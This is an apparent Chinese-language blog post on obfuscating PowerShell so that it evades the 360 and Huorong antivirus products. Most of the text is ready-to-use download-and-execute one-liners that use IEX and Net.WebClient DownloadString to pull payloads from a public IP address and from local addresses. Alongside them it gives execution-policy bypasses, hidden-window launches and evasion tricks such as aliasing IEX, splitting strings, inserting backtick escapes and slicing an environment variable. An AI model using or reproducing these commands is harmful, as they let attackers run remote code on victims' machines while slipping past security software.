powershell混淆免杀--过360,火绒

 

 

 

 

最终结果


windows10

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -

其他

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | powershell -

1.文件落地

本地读取然后通过管道符运行

powershell Get-Content1.ps1 | powershell -NoProfile -

Bypass执行策略绕过

powershell -ExecutionPolicy bypass -File ./1.ps1

Unrestricted执行策略标志

powershell -ExecutionPolicy unrestricted -File ./1.ps1

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://101.34.38.189:80/a'))"

2.文件不落地

1.为iex设置别名

iex => Invoke-expression

set-alias -name hhh -value IEX

powershell set-alias -name hhh -value IEX;hhh(New-Object Net.WebClient).DownloadString('http://192.168.1.1/123.txt')

powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://192.168.10.26:88/a/payload.ps1')

2.采用echo方式,远程下载并通过IEX运行脚本

echo Invoke-Expression(new-object net.webclient).downloadstring('http://192.168.10.26:88/a/payload.ps1') | powershell -

3.win10环境变量截取出powershell

%psmodulepath:~24,10%

4.变量拼接

$b1='invoke-Ex';$b2='pression';$a1='((new-object net.webclient).downl';$a2='oadstring(''http://192.168.0.104:80/a''))';$a3=$b1,$b2,$a1,$a2;iex(-join $a3)

5.利用'+'拼接和变量拼接

powershell "$b='((new-object net.webclient).downlo)';$a='(adstring(http://192.168.1.1/payload.ps1))';IEX ($b+$a)"

6.使用反引号处理字符,PowerShell团队使用反引号作为转义字符

`' 单引号 `" 双引号`0 空值 `a 警报`b  退格      `f 换页`n  新行      `r 回车`t 水平制表 `v 垂直制表

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -

echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | powershell -

 

 

 

 



posted @ 2021-08-14 10:06  bingtanghulu  阅读(39)  评论(0编辑  收藏  举报